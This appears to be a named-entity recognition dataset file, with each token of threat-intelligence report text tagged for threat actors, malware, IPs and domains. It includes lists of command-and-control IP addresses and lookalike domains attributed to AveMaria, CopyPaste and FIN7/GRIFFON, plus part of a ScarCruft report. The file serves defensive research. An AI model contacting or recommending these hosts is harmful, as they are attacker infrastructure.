
As O
with O
their O
previous O
fake O
company O
“ O
Combi B-IDTY
Security E-IDTY
” O
, O
we O
are O
confident O
that O
they O
continue O
to O
create O
new O
personas O
for O
use O
in O
either O
targeting O
or O
recruiting O
under O
a O
“ O
new O
” O
brand O
, O
“ O
IPC S-IDTY
” O
. O

AveMaria S-MAL
: O
185.61.138.249 S-IP
tain.warzonedns.com S-DOM
noreply377.ddns.net S-DOM
185.162.131.97 S-IP
91.192.100.62 S-IP
server.mtcc.me S-DOM
doddyfire.dyndns.org S-DOM
212.8.240.116 S-IP
168.167.45.162 S-IP
toekie.ddns.net S-DOM
warmaha.warzonedns.com S-DOM
. O

CopyPaste S-APT
: O
digi-cert.org S-DOM
somtelnetworks.com S-DOM
geotrusts.com S-DOM
secureclientupdate.com S-DOM
digicertweb.com S-DOM
sport-pesa.org S-DOM
itaxkenya.com S-DOM
businessdailyafrica.net S-DOM
infotrak-research.com S-DOM
nairobiwired.com S-DOM
k-24tv.com S-DOM
. O

FIN7 S-APT/GRIFFON S-MAL
: O
hpservice-cdn.com S-DOM
realtek-cdn.com S-DOM
logitech-cdn.com S-DOM
pci-cdn.com S-DOM
appleservice-cdn.com S-DOM
servicebing-cdn.com S-DOM
. O


ScarCruft S-APT
continues O
to O
evolve, O
introduces O
Bluetooth S-TOOL
harvester O
. O

After O
publishing O
our O
initial O
series O
of O
blogposts O
back O
in O
2016 S-TIME
, O
we O
have O
continued O
to O
track O
the O
ScarCruft S-APT
threat O
actor O
. O

ScarCruft S-APT
is O
a O
Korean-speaking O
and O
allegedly O
state-sponsored O
threat O
actor O
that O
usually O
targets O
organizations O
and O
companies O
with O
links O
to O
the O
Korean O
peninsula O
. O

We O
recently O
discovered O
some O
interesting O
telemetry O
on O
this O
actor O
, O
and O
decided O
to O
dig O
deeper O
into O
ScarCruft S-APT
’s O
recent O
activity O
. O

This O
shows O
that O
the O
actor O
is O
still O
very O
active O
and O
constantly O
trying O
to O
elaborate O
its O
attack O
tools O
. O

Based O
on O
our O
telemetry O
, O
we O
can O
reassemble O
ScarCruft S-APT
’s O
binary O
infection O
procedure O
. O

It O
used O
a O
multi-stage O
binary O
infection O
to O
update O
each O
module O
effectively O
and O
evade O
detection O
. O

In O
addition O
, O
we O
[truncated: 1,234,602 more chars]
